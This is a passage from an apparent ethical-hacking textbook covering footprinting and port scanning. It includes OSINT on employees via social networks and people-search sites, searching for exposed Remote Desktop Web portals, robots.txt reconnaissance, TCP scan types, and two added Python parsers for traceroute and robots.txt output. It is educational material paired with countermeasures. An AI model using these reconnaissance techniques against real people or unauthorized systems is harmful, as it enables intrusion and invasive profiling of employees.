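The analysis above is easy to automate. The following is an added example (not the textbook's own code) that parses tracert output in the layout shown, computes the median round-trip time per hop, flags large latency increases such as the jump at hop 8, picks the next-to-last responding hop as the edge-device candidate, and refuses to guess when the trace ends in time-outs. SAMPLE_TRACE is the trace shown above re-typed; FILTERED_TRACE, the 100 ms threshold and the hostname-hint table are constructed assumptions, and the UNIX traceroute layout is not handled.

```python
"""Parse tracert output and pull out what the footprinter cares about.

Added example, not the textbook's own code.  SAMPLE_TRACE is the trace shown
above, re-typed.  FILTERED_TRACE, the latency threshold and the hostname hint
table are constructed assumptions.
"""
import re
from statistics import median

SAMPLE_TRACE = """\
Tracing route to arin.net [202.131.95.30]

  1     1 ms     1 ms     1 ms  192.168.123.254
  2    12 ms    15 ms    11 ms  adsl-69-151-223-254.dsl.hstntx.swbell.net [69.151.223.254]
  3    12 ms    12 ms    12 ms  151.164.244.193
  4    11 ms    11 ms    11 ms  bb1-g14-0.hstntx.sbcglobal.net [151.164.92.204]
  5    48 ms    51 ms    48 ms  151.164.98.61
  6    46 ms    48 ms    48 ms  gi1-1.wil4.net.reach.com [206.223.123.11]
  7    49 ms    50 ms    48 ms  i-0-0-0.wil-core02.bi.reach.com [202.84.251.233]
  8   196 ms   195 ms   196 ms  i-15-0.sydp-core02.bx.reach.com [202.84.140.37]
  9   204 ms   202 ms   203 ms  unknown.net.reach.com [134.159.131.110]
 10   197 ms   197 ms   200 ms  ssg550-1-r1-1.network.netregistry.net [202.124.240.66]
 11   200 ms   227 ms   197 ms  forward.planetdomain.com [202.131.95.30]
"""

# Constructed: what a trace into a filtering network looks like (203.0.113.0/24
# is a documentation range, so this target is fictional).
FILTERED_TRACE = """\
Tracing route to 203.0.113.10

  1    <1 ms    <1 ms    <1 ms  192.168.123.254
  2    12 ms    15 ms    11 ms  adsl-69-151-223-254.dsl.hstntx.swbell.net [69.151.223.254]
  3     *        *        *     Request timed out.
"""

HOP_RE = re.compile(r"^\s*(\d+)\s+((?:(?:<?\d+\s*ms|\*)\s+){1,3})(.*?)\s*$")
PROBE_RE = re.compile(r"<?\d+\s*ms|\*")
HOST_RE = re.compile(r"^(.+?)\s*\[([\d.]+)\]$")
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed hint table: operators name devices by role, which leaks topology.
ROLE_HINTS = {
    "ssg": "Juniper SSG security gateway",
    "core": "backbone core router",
    "dsl": "DSL access or aggregation",
}


def parse_trace(text):
    """Return one dict per hop: number, list of RTTs (None for '*'), name, ip."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue  # banner and blank lines
        rtts = [None if p == "*" else int(re.sub(r"\D", "", p))
                for p in PROBE_RE.findall(m.group(2))]  # "<1 ms" counts as 1
        host, name, ip = m.group(3), None, None
        hm = HOST_RE.match(host)
        if hm:
            name, ip = hm.group(1), hm.group(2)
        elif IP_RE.match(host):
            ip = host
        elif any(r is not None for r in rtts):
            name = host  # replied, but tracert printed no address
        hops.append({"hop": int(m.group(1)), "rtts": rtts, "name": name, "ip": ip})
    return hops


def median_rtt(hop):
    """Median of the probes that answered, or None if all of them timed out."""
    answered = [r for r in hop["rtts"] if r is not None]
    return median(answered) if answered else None


def latency_jumps(hops, min_increase_ms=100):
    """Hop numbers where the median RTT rises by at least min_increase_ms.

    A rise of that size usually marks a long-haul link, which places the
    hops after it geographically.
    """
    flagged, prev = [], None
    for hop in hops:
        cur = median_rtt(hop)
        if cur is not None:
            if prev is not None and cur - prev >= min_increase_ms:
                flagged.append(hop["hop"])
            prev = cur
    return flagged


def edge_candidate(hops):
    """Next-to-last responding hop: the textbook's candidate for the edge device.

    Returns None when the trace ends in time-outs, because then the last
    visible hop is wherever filtering started, not the hop before the target.
    """
    if not hops or hops[-1]["ip"] is None:
        return None
    responding = [h for h in hops if h["ip"] is not None]
    return responding[-2] if len(responding) >= 2 else None


def name_hints(hop):
    """Roles suggested by the router's hostname, per the constructed table."""
    name = (hop["name"] or "").lower()
    return [role for token, role in ROLE_HINTS.items() if token in name]


if __name__ == "__main__":
    hops = parse_trace(SAMPLE_TRACE)
    print("latency jumps at hops:", latency_jumps(hops))
    edge = edge_candidate(hops)
    print("edge candidate:", edge["hop"], edge["name"], name_hints(edge))
    print("filtered trace edge:", edge_candidate(parse_trace(FILTERED_TRACE)))
```

The threshold in latency_jumps() is deliberately coarse: it is meant to separate a continent-crossing hop from ordinary queueing jitter, not to locate hops precisely. edge_candidate() returns None for the filtered trace on purpose; reporting hop 2 there would blame the attacker's own ISP for being the target's firewall.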

Tracking an Organization’s Employees

You can use the Web to find a wealth of information about a particular organization
that can be used to plan a later attack. The techniques so far have gathered information
on the financial health of a company, its infrastructure, and other similar information
that can be used to build a picture of the target. Of all the information gathered so far,
there is one area that has yet to be explored: the human element. Gathering information
on human beings is something that until recently has not been easy, but now with
the ever-increasing amount of information people themselves put online, the task has
become easier. The growing usage of social networking such as Facebook, MySpace,
and Twitter has served to provide information that can be searched and tracked
back to an individual. According to Harris Interactive for CareerBuilder.com, 45 percent
of employers questioned are using social networks to screen job candidates (and so are
attackers). Information that can be uncovered online can include the following:

• Posted photographs or information
• Posted content about drinking or drug usage
• Posting derogatory information about previous employers, coworkers, or clients
• Discriminatory comments or fabricated qualifications

The motivation behind providing examples of such information is to give an idea of what
the average user of social networking puts on the Internet. An attacker wanting to gain
a sense of a company can search social networks and find individuals who work for the
target and engage in idle gossip about their work. A single employee of a company talking
too liberally about goings-on at work can provide another layer of valuable insight that
can be used to plan an attack.

Although disgruntled employees definitely are a security threat, there are other less
ominous actions that a human can take that will affect security. A single employee can be
a source of information leakage that could result in damaging information leaks or other
security threats. Consider the fact that it is not uncommon to find an employee posting
information on blogs, Facebook, Twitter, or other locations that can be publicly accessed.
Other employees have been known to get upset and set up what is known as a “sucks”
domain, in which varying degrees of derogatory information are posted. Some of these
locations include the following:

• Blogs
• Personal pages on a social networking site: Facebook, MySpace, LinkedIn
• People-tracking sites

Each of these sites can be examined for names, e-mail addresses, addresses, phone
numbers, photographs, and so on. As an example, consider the Peoples Dirt site
(http://www.peoplesdirt.com), which is shown in Figure 5-14.

This site is designed to allow individuals to make anonymous posts about other
individuals or organizations. Any disgruntled person can post libelous or hate-filled
messages.

Web logs, or blogs, are a good source for information about a targeted company if one
can be located. Anyone can go to one of the many free blogging sites and set up a blog
on which to post unfiltered comments and observations. As such, attackers have found
them a valuable source of information. However, one of the bigger problems with blogs
for the attacker is finding a blog that contains the information that may be useful. Consider
the fact that a tremendous number of blogs exist, and of those only a small number are
ever updated; the rest are simply abandoned by the owners. Wading into the sea of blogs
on the Internet is a challenge, but using a dedicated blog search engine will allow for
searches of many blogs quickly. Additional sites such as http://www.spock.com allow users
to search personal pages such as Facebook and MySpace for specific content.

One of the reasons why social networking is such an effective tool is that the typical user
of these services does not think of the information that is being shared. Individuals using
social networks have been known to post all sorts of activities, from dating and clubbing
to information about bathroom and eating habits. Perhaps the best example of how loosely
people share information in social networks is Twitter. A cursory look at Twitter quickly reveals
a treasure trove of information about most users on the service. Keep in mind that the average
user of Twitter does not typically use the features in the application to keep their postings
private, either because they don’t know about these settings or because they simply want
to feel important by broadcasting their thoughts to anyone who might listen.

FIGURE 5-14

Peoples Dirt Web site.

FIGURE 5-15

Zabasearch.

Sucks domains are domain names that have the word “sucks” in the name
(for example, http://www.walmartsucks.org and http://www.paypalsucks.com). These are
sites in which individuals have posted unflattering content about the targeted company
due to a perceived slight or wrong. An interesting note about sucks sites is that although
such sites may seem wrong or downright illegal, the comments posted on them have
been frequently protected under free speech laws. Such sites are usually taken down,
however, partly due to the domain name not actually being used or the domain simply
being “parked” (although if the site is active and noncommercial, the courts have
sometimes ruled such sites legal).

Finally, another way of gaining information about an individual is to access sites that
gather or aggregate information for easy retrieval. One such site is
http://www.zabasearch.com, of which an example search is shown in Figure 5-15. Another
similar site to Zabasearch is http://www.spokeo.com, which accumulates data from many
sources such as Facebook, public records, photos, and other sources that can be searched
to build a picture of an individual.

NOTE

Even job search sites such as Monster.com and Careerbuilder.com are prime targets for
information. If an organization uses online job sites, pay close attention to what type
of information is revealed about the company’s technology.

FIGURE 5-16

Windows Remote Desktop Web connection.

Exploiting Insecure Applications

Many applications were not built with security in mind. Insecure applications such as
Telnet, File Transfer Protocol (FTP), the r commands, Post Office Protocol (POP),
Hypertext Transfer Protocol (HTTP), and Simple Network Management Protocol (SNMP)
operate without encryption; SNMP versions 1 and 2c, for example, send their community
strings in clear text. What adds to the problem is that some organizations even
inadvertently put this information on the Web. As an example, a simple search engine
query for terminal service Web access (tsweb, the directory name used by the Remote
Desktop Web Connection) returns dozens of hits that appear similar to Figure 5-16. This
application is designed to allow users to connect to a work or home computer and access
files just as if physically sitting in front of the computer. The problem with locating
this information online is that an attacker can use the information to get further
details about the organization or even break in more quickly in some cases.

NOTE

Organizations that are more
ambitious should consider
attempting to footprint
themselves to see firsthand
what types of information are
currently in the public space
and whether such information
is potentially damaging.

Using Basic Countermeasures

Footprinting can be a very powerful tool in the hands of
an attacker who has the knowledge and patience to ferret
out the information that is available about any entity
online. But although footprinting is a powerful tool, there
are some countermeasures that can lessen the impact
to varying degrees.

The following shows some of the defenses that can
be used to thwart footprinting:

• Web site — Any organization should take a long hard look at the information
available on the company Web site and determine whether it might be useful
to an attacker. Any potentially sensitive or restricted information should
be removed as soon as possible, along with any unnecessary information.
Special consideration should be given to information such as e-mail addresses,
which should be limited to only those who require it. Additionally, the applications,
programs, and protocols used by a company should be nondescript to avoid revealing
the nature of services or the environment.

• Google hacking — This attack can be thwarted to a high degree by sanitizing
information that is available publicly wherever possible. Sensitive information
should not be posted in any location, either linked or unlinked, that can be accessed
by a search engine, as the public locations of a Web server tend to be.

• Job listings — When possible, use third-party companies for sensitive jobs so the
company is unknown to all but approved applicants. If third-party job sites are used,
the job listing should be as generic as possible, and care should be taken not to list
specific versions of applications or programs. Consider carefully crafting job postings
to reveal less about the IT infrastructure.

• Domain information — Always ensure that domain registration data is kept as
generic as possible, and that specifics such as names, phone numbers, and the like
are avoided. If possible, employ any one of the commonly available proxy services
to block the access of sensitive domain data. An example of one such service
is shown in Figure 5-17.

• Employee posting — Be especially vigilant about information leaks generated
by well-intentioned employees who may post information in technical forums
or discussion groups that may be too detailed. More important, be on the
lookout for employees who may be disgruntled and who may release sensitive
data or information that can be viewed or accessed publicly. It is not uncommon
for information leakage to occur around events such as layoffs or mergers.

FIGURE 5-17

Domains by proxy.

• Insecure applications — Make it a point to regularly scan search engines to see
whether links to private services are available (Terminal Server, Outlook Web App
[OWA], virtual private networks [VPNs], and so on). Telnet and FTP have similar
security problems because FTP allows anonymous logon and both send passwords in
clear text. Consider replacing such applications with a more secure application such
as SSH or comparable wherever possible or feasible.

• Securing DNS — Sanitize DNS registration and contact information to be as generic
as possible (for example, “Web Services Manager,” main company phone number
555-1212, techsupport@hackthestack.com). Have two DNS servers, one internal and one
external in the demilitarized zone (DMZ). The external DNS should contain only
resource records of the DMZ hosts, not the internal hosts. For additional safety, do
not allow zone transfers to any IP address other than your own secondary name servers.

NOTE

A good proactive step is for a company to research the options to block a search
engine’s bots from indexing a site. One of the best examples of code that tells search
engines how a site can be indexed is the robots.txt file. The robots.txt file can be
configured to block the areas a search engine looks, but it can also be accessed by a
hacker, who can open the file in any commonly available text editor. Anything listed
in robots.txt should therefore be protected by authentication, not merely hidden
from search engines.
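The NOTE above warns that robots.txt is readable by anyone. The following script is an added example (not the textbook's own code) that parses a constructed robots.txt the way an attacker would, collecting every Disallow path, flagging the ones that look like the private services named in the Insecure applications item (tsweb, OWA, administrative interfaces) against a small constructed keyword table, and applying the longest-match rule so a defender can confirm what each crawler is actually told. The sample file, the host name www.example.com and the keyword table are assumptions; wildcard patterns are not handled.

```python
"""Read robots.txt the way a footprinter does: as a list of paths worth a look.

Added example, not the textbook's own code.  SAMPLE_ROBOTS, the hostname and
the SENSITIVE_TOKENS table are constructed; wildcard patterns are not handled.
"""

SAMPLE_ROBOTS = """\
# constructed sample for a fictional server, www.example.com
User-agent: *
Disallow: /admin/
Disallow: /tsweb/
Disallow: /backup
Allow: /public/

User-agent: Googlebot
Disallow: /owa/
Sitemap: https://www.example.com/sitemap.xml
"""

# Constructed: path fragments that usually mean a private service was exposed.
SENSITIVE_TOKENS = {
    "admin": "administrative interface",
    "tsweb": "Remote Desktop Web Connection",
    "owa": "Outlook Web App",
    "backup": "backup files",
    "vpn": "VPN portal",
}


def parse_robots(text):
    """Return ({agent: {"disallow": [...], "allow": [...]}}, [sitemap urls]).

    A group is one or more consecutive User-agent lines followed by rules; a
    User-agent line that appears after rules starts a new group.
    """
    groups, sitemaps = {}, []
    current, rules_seen = [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            if rules_seen:
                current, rules_seen = [], False
            current.append(value)
            groups.setdefault(value, {"disallow": [], "allow": []})
        elif key in ("disallow", "allow") and current:
            rules_seen = True
            if value:  # an empty Disallow means "everything is allowed"
                for agent in current:
                    groups[agent][key].append(value)
        elif key == "sitemap":
            sitemaps.append(value)
    return groups, sitemaps


def disallowed_paths(groups):
    """Every Disallow path in file order, without duplicates."""
    seen, out = set(), []
    for rules in groups.values():
        for path in rules["disallow"]:
            if path not in seen:
                seen.add(path)
                out.append(path)
    return out


def flag_sensitive(paths):
    """Map each path that matches the token table to what it probably exposes."""
    flags = {}
    for path in paths:
        for token, meaning in SENSITIVE_TOKENS.items():
            if token in path.lower():
                flags[path] = meaning
                break
    return flags


def is_allowed(groups, agent, path):
    """Longest-matching rule wins, Allow winning ties; unmatched paths are allowed.

    A crawler obeys only its own group, falling back to '*', so a Disallow in
    the '*' group does not apply to an agent that has a group of its own.
    """
    rules = groups.get(agent) or groups.get("*")
    if not rules:
        return True
    best, allowed = -1, True
    for kind in ("allow", "disallow"):
        for pattern in rules[kind]:
            if path.startswith(pattern) and len(pattern) > best:
                best, allowed = len(pattern), kind == "allow"
    return allowed


if __name__ == "__main__":
    groups, sitemaps = parse_robots(SAMPLE_ROBOTS)
    paths = disallowed_paths(groups)
    print("hidden paths:", paths)
    print("worth a look:", flag_sensitive(paths))
    print("sitemaps:", sitemaps)
    print("Googlebot may fetch /admin/:", is_allowed(groups, "Googlebot", "/admin/"))
```

The last line of the usage section illustrates the defender's side of the NOTE: because Googlebot has its own group in the sample, the /admin/ entry in the wildcard group does not bind it at all, so the file neither hides the path from a crawler nor from an attacker. The only fix is access control on the path itself.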
CHAPTER SUMMARY

This chapter covered the process of footprinting, or passively obtaining information
about a target. In its most basic form, footprinting is simply information gathering that
is performed carefully to avoid detection completely, or for as long as possible, while
always trying to maintain a stealthy profile. Ultimately, the goal of footprinting is to
gather as much information as possible about the intended victim without giving away
intentions or even the presence of the attacker involved.

If done carefully and methodically, footprinting can reveal large amounts of information
about a target. The process, when complete, will yield a better picture of the intended
victim. In most situations, a large amount of time will be spent performing this process
with relatively lesser amounts of time being spent in the actual hacking phase. Patience
in the information gathering phase is a valuable skill to learn alongside how to actually
gain the information. Ideally, information gathered from a well-planned and executed
footprinting process will make the hacking process more effective.

Remember, footprinting includes gathering information from a diverse group of sources
and locations. Common sources of information used in the footprinting phase include
company Web sites, financial reports, Google searches, social networks, and other similar
technologies. Attackers can and will review any source of information that can fill out
the picture of the victim more than it would be otherwise.

KEY CONCEPTS AND TERMS

Footprinting
Google hacking
Insecure applications
Internet Archive
Internet Assigned Numbers Authority (IANA)
Nslookup
Regional Internet Registries (RIRs)
Social networking site
Traceroute
Whois

CHAPTER 5 ASSESSMENT

1. What is the best description of footprinting?
A. Passive information gathering
B. Active information gathering
C. Actively mapping an organization’s vulnerabilities
D. Using vulnerability scanners to map an organization

2. Which of the following is the best example of passive information gathering?
A. Reviewing job listings posted by the targeted company
B. Port scanning the targeted company
C. Calling the company and asking questions about its services
D. Driving around the targeted company connecting to open wireless connections

3. Which of the following is not typically a Web resource used to footprint a company?
A. Company Web site
B. Job search sites
C. Internet Archive
D. Phonebooks

4. If you were looking for information about a company’s financial history you would
want to check the ______ database.

5. Which of the following is the best description of the intitle tag?
A. Instructs Google to look in the URL of a specific site
B. Instructs Google to ignore words in the title of a specific document
C. Instructs Google to search for a term within the title of a document
D. Instructs Google to search a specific URL

6. If you need to find a domain that is located in Canada, the best RIR to check first
would be ______.

7. You have been asked to look up a domain that is located in Europe. Which RIR should
you examine first?
A. LACNIC
B. APNIC
C. RIPE
D. ARIN

8. SNMP uses encryption and is therefore a secure program.
A. True
B. False

9. You need to determine the path to a specific IP address. Which of the following tools
is the best to use?
A. IANA
B. Nslookup
C. Whois
D. Traceroute

10. During the footprinting process social networking sites can be used to find out about
employees and look for technology policies and practices.
A. True
B. False

CHAPTER 6

Port Scanning

FOOTPRINTING IS A PROCESS that passively gathers information about a target from many
diverse sources. The goal of footprinting is to learn about a target system prior to
launching an attack.
If footprinting is performed patiently and thoroughly, a very detailed picture of a victim
can be achieved, but that still leaves this question: What’s next? If all this information
is gathered up, organized, and placed before the attacker, how can it be acted upon? This
next step, port scanning, is an active process that gathers information in more detail than
footprinting can. Because it sends packets to the target, it can be detected and logged,
which is one reason footprinting is done first. After the target has been analyzed and all
relevant information organized, port scanning can take place. The goal of performing port
scanning is to identify open and closed ports as well as the services running on a given
system. Port scanning forms a critical step in the hacking process because the hacker needs
to identify what services are present and running on a target system prior to initiating an
effective attack. Port scanning also helps to determine the course of action in future steps
because once the nature of running services is identified, the correct tools can be selected
from the hacker’s toolbox. For example, a hacker may have a tool to target a file transfer
service such as the Washington University FTP server (WU-FTPD). However, if the victim is
running Microsoft’s File Transfer Protocol (FTP) service, the exploit tool will be
incompatible. Once a port scan has been thoroughly performed, the hacker can then move on to
mapping the network and looking for vulnerabilities that can be exploited.
Chapter 6 Topics

This chapter covers the following topics and concepts:

• How to determine the network range
• How to identify active machines
• How to map open ports
• What operating system (OS) fingerprinting is
• How to map the network
• How to analyze the results

Chapter 6 Goals

When you complete this chapter, you will be able to:

• Define port scanning
• Describe common port scanning techniques
• List common Nmap switches
• Describe why User Datagram Protocol (UDP) is harder to scan than Transmission Control
Protocol (TCP)
• Define common Nmap command switches
• Describe OS fingerprinting
• Detail active fingerprinting
• List differences between active and passive fingerprinting
• List network mapping tools

Determining the Network Range

The first step in port scanning is one of preparation, specifically the gathering of
information about the range of Internet Protocol (IP) addresses in use by the target. When
identifying the network range, your ultimate goal is to get a picture of what the range of
IP addresses in use looks like together with the appropriate subnet mask in use. With this
information the port scanning process can become much more accurate and effective as only
the IP addresses of the intended victim will be scanned. Not having the appropriate network
range can result in an inaccurate or ineffective scan that may even inadvertently set off
defensive measures. When gathering information about the network ranges, two options can be
used. With a manual registrar query, you simply go directly to the registration sites and
query for information manually. With an automatic registrar query, you use Web-based tools.
No matter how the range is determined, it is essential that the range be positively
identified before you go any further.
NOTE

Chapter 5 provides a more in-depth explanation of the tools that can be used: manual
registrar query (from the Internet Assigned Numbers Authority, or IANA), the Root Zone
Database, Whois, and automatic registrar query.

Identifying Active Machines

Once a valid network range has been obtained, the next step is to identify active machines
on the network. There are several ways that this task can be accomplished, including the
following:

• Wardialing
• Wardriving
• Pinging
• Port scanning

Each of these methods offers different capabilities useful in detecting active systems and
as such will need to be explored individually. To use each of these techniques the attacker
must clearly understand areas for which they are useful as well as those areas in which they
are weak.

Wardialing

An old but still useful technique is wardialing. Wardialing is a technique that has existed
for more than 25 years as a footprinting tool, which explains why the process involves the
use of modems. Wardialing is very simple: it uses a modem to dial up phone numbers to locate
modems. Upon first look, the technique looks sorely out of place in a world of broadband and
wireless connection technology, but modems are still widely used due to the low cost of the
technology. An attacker who picked a town at random and dialed up a range of phone numbers
in that town would likely turn up several computers with modems attached. Wardialing can
still be effective even in a world of high-speed connection technologies. Dialing a range
of phone numbers and getting several modems to respond doesn’t initially sound significant
until what is connected to those modems is considered. While modems are not nearly as
popular as they were several years ago, their presence is still felt, as modems can be found
connected to devices such as private branch exchanges (PBX), firewalls, routers, fax
machines, and a handful of other systems not including actual computers. When you include
more sensitive devices such as routers and firewalls, someone dialing up a modem and
attaching to a firewall or router remotely takes on new significance. A modem can and should
be looked at as a viable backdoor into a network, one that should factor in when planning
defensive measures.

NOTE

The name wardialing originated from the 1983 film WarGames. In the film, the protagonist
programmed his computer to dial phone numbers in a town to locate a computer system with the
game he was looking for. In the aftermath of the popularity of the movie, the name WarGames
Dialer was given to programs designed to do the same thing. Over time, the name was
shortened to wardialing.

While there is a long list of wardialing programs that have been created over the years,
three well-known wardialing tools include:

• ToneLoc — A wardialing program that looks for dial tones by randomly dialing numbers or
dialing within a range. It can also look for a carrier frequency of a modem or fax. ToneLoc
uses an input file that contains the area codes and number ranges you want it to dial.
• THC-Scan — An older DOS-based program that can use a modem to dial ranges of numbers in
search of a carrier frequency from a modem or fax.
• PhoneSweep — One of the few commercial options available in the wardialing market.

Why is wardialing still successful? One of the biggest reasons is the relative lack of
attention paid to modems by corporations. Modems tend to be thought of as old, low-tech
devices unworthy of serious attention by defenders of a network or attackers. As such, it is
not uncommon to find modems attached to networks that are still active, but forgotten and
unmonitored. In some cases, modems have been discovered active and attached to a company
network only after a phone bill was submitted to closer scrutiny, generating questions about
what certain phone numbers are used for.
Wardriving

Wardriving is another valuable technique for uncovering access points into a network. Wardriving is the process of locating wireless access points and gaining information about the configuration of each. This "sniffing" can be performed with a notebook, a car, and software designed to record the access points detected. Additionally, a global positioning system (GPS) can be included to go to the next step of mapping the physical location of the access points. Don't get caught up in names, however; wardriving or variations can be performed with the same equipment while walking, biking, or even flying.

If an attacker is able to locate even a single unsecured access point, the dangers can be enormous, as it can give that same attacker quick and easy access to the internal network of a company. An attacker connecting to an unsecured access point is more than likely bypassing protective measures such as the corporate firewall, for example.

NOTE: Always check local laws before using any security/hacking tools. As an example, some states have laws that make it illegal to place a call without the intent to communicate. In fact, several laws banning the use of automated dialing systems used by companies such as telemarketers were a direct result of wardialing activities.

CHAPTER 6 Port Scanning 141

But Is It Legal?

It has been debated by black hats and white hats whether the act of wardriving is legal or not. Currently there are no laws specifically making wardriving illegal. However, using the information obtained to gain unauthorized access to a network is. For example, in the United States a case that is generally cited in the debate is the case of State v. Allen. In this case, Allen used wardialing techniques in an effort to attach to Southwestern Bell's network in a bid to get free long-distance calling. However, even though Allen connected to Southwestern Bell's system, he did not attempt to bypass any security measure that appeared after the connection was made. In the end, the ruling was that although a connection was made, access was not.

While there are a multitude of tools used to perform wardriving, other tools, including the following, are useful in defending against these attacks:

• AirSnort — Wireless cracking tool
• AirSnare — An intrusion detection system to help you monitor your wireless networks. It can notify you as soon as an unapproved machine connects to your wireless network.
• Kismet — Wireless network detector, sniffer, and intrusion detection system commonly found on Linux
• NetStumbler — Wireless network detector; also available for Mac and for handhelds

So why is wardriving successful? One of the most common reasons is that employees install their own access points on the company network without company permission (known as rogue access points). An individual who installs an access point in such a way will more than likely have no knowledge of, or possibly not care about, good security practices and by extension leave the access point completely unsecured. Another reason is that sometimes when an access point has been installed, those performing the installation have actively decided not to configure any security features. Wardriving generally preys upon situations in which security is not considered or is poorly planned. Steps should be taken to ensure that neither happens.

By definition, wardriving is only the process of locating access points in the surveyed area. In reality, an individual practicing wardriving simply drives through an area, making note of the types and locations of access points, disregarding services that may be offered. If an attacker moves toward investigating further (attempting to determine the services that are available), the attacker is then piggybacking.
Ping is a protocol that is very useful in troubleshooting many network problems and, as such, has a useful purpose. In some situations, shutting off or blocking ping may actually affect the network more than the security measure is worth. Astute network administrators are well aware of the potential danger of leaving ping available, but in many instances they leave it enabled anyway to make network management easier.

NOTE: If you want to learn more about ping and how ICMP works, take a moment to review RFC 792. It can be found at http://www.faqs.org/rfcs/rfc792.html.

Pinging

A technique that is useful at determining whether a system is present and active is a ping sweep of an IP address range. By default, a computer will respond to a ping request with a ping reply or echo. A ping is actually an Internet Control Message Protocol (ICMP) message. With the use of a ping, it is possible to identify active machines and measure the speed at which packets are moved from one host to another, as well as obtain details such as the Time to Live (TTL).

A key advantage of ICMP scanning is that it can be performed rapidly because it runs scanning and analysis processes in parallel. In other words, more than one system can be scanned simultaneously; thus it is possible to scan an entire network rapidly. There are several tools available that can perform ping scans, but three of the better known ones include Pinger, Friendly Pinger, and WS Ping Pro.

Of course, for every pro there is a con, and pinging in this manner is not without issue. First, it is not uncommon for network administrators to specifically block ping at the firewall or even turn off ping completely on host devices. Second, it is a safe bet that any intrusion detection system (IDS) or intrusion prevention system (IPS) that is in place will detect and alert network managers in the event a ping sweep occurs. Finally, ping sweeps have no capability to detect systems that are plugged into the network but powered down. Remember, just because a ping sweep doesn't return any results, it does not mean that no systems are available. Ping could be blocked and/or the systems pinged may be off.

Port Scanning

The next step to take after discovering active systems is to find out what is available on the systems; in this case, a technique known as port scanning is used. Port scanning is designed to probe each port on a system in an effort to determine which ports are open. It is effective for gaining information about a host because the probes sent toward a system have the ability to reveal more information than a ping sweep can. A successful port scan will return results that give a clear picture of what is running on a system. This is because ports are bound to applications.

A discussion of port scanning can't proceed without a clear understanding of some of the fundamentals of ports. In all, there are 65,535 TCP and 65,535 UDP ports on any given system. Each of these port numbers identifies a specific process that is either sending or receiving information at any time. At first glance, it might seem that a security professional would have to memorize all 65,000-plus ports in order to be adequately prepared, but this is not the case. In reality, only a few ports should ever be committed to memory, and if a port scan returns any ports that are not immediately recognizable, those port numbers should be further scrutinized. Some common port numbers are shown in Table 6-1.

TABLE 6-1 Common port numbers.

| PORT | SERVICE | PROTOCOL |
|---|---|---|
| 20/21 | FTP | TCP |
| 22 | SSH | TCP |
| 23 | Telnet | TCP |
| 25 | SMTP | TCP |
| 53 | DNS | TCP/UDP |
| 80 | HTTP | TCP |
| 110 | POP3 | TCP |
| 135 | RPC | TCP |
| 161/162 | SNMP | UDP |
| 1433/1434 | MSSQL | TCP |

Contained in the list of common port numbers in Table 6-1 is an important detail located in the last column.
In this column, the protocol in use is listed as either TCP or UDP (the same protocols discussed earlier when reviewing the TCP/IP suite of protocols). In practice, applications that access the network can do so using either TCP or UDP, based on how the service is designed. An effective port scan will be designed to take into account both TCP and UDP as part of the scanning process; these protocols work in different ways. TCP acknowledges each connection attempt; UDP does not, so it tends to produce less reliable results.

FYI: A complete list of all ports and their assigned services is available at http://www.iana.org/assignments/port-numbers. Memorizing all the ports available is not necessary and a pointless exercise; instead, it is worth knowing several of the common ports and looking up those that are suspicious or unusual. A good practice is to be able to access the list of ports at a site such as http://www.iana.org in case an unfamiliar port appears on a scan.

TABLE 6-2 TCP flag types.

| FLAG | PURPOSE |
|---|---|
| SYN | Synchronize sequence number |
| ACK | Acknowledgement of sequence number |
| FIN | Final data flag used during the four-step shutdown |
| RST | Reset bit used to close an abnormal connection |
| PSH | Push data bit used to signal that data in this packet should be pushed to the beginning of the queue |
| URG | Urgent data bit used to signify that there are urgent control characters in this packet that should have priority |

A Closer Look at TCP Port Scanning Techniques

TCP is a protocol that was designed to enable reliable communication, fault tolerance, and reliable delivery. Each of these attributes allows for a better communication mechanism, but at the same time these features allow an attacker to craft TCP packets designed to gain information about running applications or services. To better understand these attacks, a quick overview of flags is needed. Flags are bits that are set in the header of a packet, each describing a specific behavior as shown in Table 6-2. A penetration tester or attacker with a good knowledge of these flags can use this knowledge to craft packets and tune scans to get the best results every time.

TCP offers tremendous capability and flexibility due to flags that can be set as needed. However, UDP does not offer the same capabilities, largely because of the mechanics of the protocol itself. UDP can be thought of as a fire-and-forget or best-effort protocol and, as such, uses none of the flags and offers none of the feedback that is provided with TCP. UDP is harder to scan with successfully; as data is transmitted, there are no mechanisms designed to deliver feedback to the sender. A failed delivery of a packet from a client to a server offers only an ICMP message as an indicator of events that have transpired.

One of the mechanisms that port scanning relies on is the use of a feature known as flags. Flags are used in the TCP protocol to describe the status of a packet and the communication that goes with it. For example, a packet flagged with the FIN flag signals the end or clearing of a connection. The ACK flag is a signal used to indicate that a connection has been acknowledged. An XMAS scan is a packet that has all its flags active at once, in effect "lit up" like a XMAS tree.

Some of the more popular scans designed for TCP port scanning include:

• TCP connect scan — This type of scan is the most reliable but also the easiest to detect. This attack can be easily logged and detected because a full connection is established. Open ports reply with a SYN/ACK while closed ports respond with a RST/ACK.
• TCP SYN scan — This type of scan is commonly referred to as half open because a full TCP connection is not established. This type of scan was originally developed to be stealthy and evade IDS systems, although most modern systems have adapted to detect it. Open ports reply with a SYN/ACK while closed ports respond with a RST/ACK.
• TCP FIN scan — This scan attempts to detect a port by sending a request to close a nonexistent connection. This type of attack is enacted by sending a FIN packet to a target port; if the port responds with a RST, it signals a closed port. This technique is usually effective only on UNIX devices.
• TCP NULL scan — This attack is designed to send packets with no flags set. The goal is to elicit a response from a system to see how it responds and then use the results to determine the ports that are open and closed.
• TCP ACK scan — This scan attempts to determine access control list (ACL) rule sets or identify if stateless inspection is being used. If an ICMP destination unreachable message is returned, the port is considered to be filtered.
• TCP XMAS tree scan — This scan functions by sending packets to a target port with flags set in combinations that are illegal or illogical. The results are then monitored to see how a system responds. Closed ports should return an RST.

Detecting Half-Open Connections

Half-open connections can still be detected, but less easily than full-open scans. One way to detect half-open connections on Windows is to run the following command; the results follow:

netstat -n -p TCP

PROTOCOL LOCAL ADDRESS FOREIGN ADDRESS STATE
TCP 10.150.0.200:21 237.177.154.8:25882 Established
TCP 10.150.0.200:21 236.15.133.204:2577 Established
TCP 10.150.0.200:21 127.160.6.129:51748 Established
TCP 10.150.0.200:21 236.220.13.25:47395 Established
TCP 10.150.0.200:21 227.200.204.182:60427 Established
TCP 10.150.0.200:21 232.115.18.38:278 Established
TCP 10.150.0.200:21 229.116.95.96:5122 Established
